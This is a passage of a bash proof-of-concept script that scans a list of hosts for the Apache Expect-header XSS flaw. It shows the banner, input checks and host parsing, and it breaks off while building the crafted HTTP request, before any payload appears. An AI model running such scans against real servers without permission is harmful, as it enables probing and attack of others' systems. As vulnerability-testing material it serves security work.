Apache EXPECT Header XSS POC
A proof of concept for the Apache EXPECT header XSS
#!/usr/bin/env bash
#
# Check a list of hosts running a web server for the Apache EXPECT header XSS.
# Argument 1 is a file containing the list of hosts, one per line (format: hostname/IP PORT).
# Outputs a file listing the host(s) found to be vulnerable.
#
# ./xss_apache_expect.sh hosts_file
#
# sample content of hosts_file (line by line)
#
# yehg.org 80
# 127.0.0.1 80
#
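# Banner: tool title and author credit. The strings are quoted so that the
# "[at]" in the e-mail address is printed literally instead of being treated
# as a glob pattern against files in the current directory.
printf '%s\n' \
  '++++++++++++++++++++++++++++++++++++' \
  'Apache EXPECT Header XSS POC' \
  'by Aung Khant, aungkhant[at]yehg.net, http://yehg.net' \
  '++++++++++++++++++++++++++++++++++++' \
  ''

# Exactly one argument is required: the hosts file described in the header
# (one "hostname/IP PORT" entry per line). A usage error goes to stderr and
# exits non-zero so that a calling script or scheduler can tell a
# mis-invocation apart from a completed run.
if [ "$#" -ne 1 ]; then
  printf 'Usage: %s <hosts_file>\n' "$0" >&2
  exit 2
fi

# Fail early, with a clear message, when the hosts file is missing or
# unreadable, rather than carrying on with no input.
if [ ! -r "$1" ]; then
  printf '%s: cannot read hosts file: %s\n' "$0" "$1" >&2
  exit 1
fi

# Split on newlines only: each "hostname/IP PORT" entry contains a space, so
# the default IFS would break one entry into two words when the file is read.
IFS=$'\n'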
for i in `cat $1`
do
sp1=`expr index $i " "`
sp2=`echo $sp1-1|bc`
host=`expr substr $i 1 $sp2`
port=${i:$sp1}
if echo -en "GET / HTTP/1.1\nHost: $i\r\nConnection: close\r\nExpect: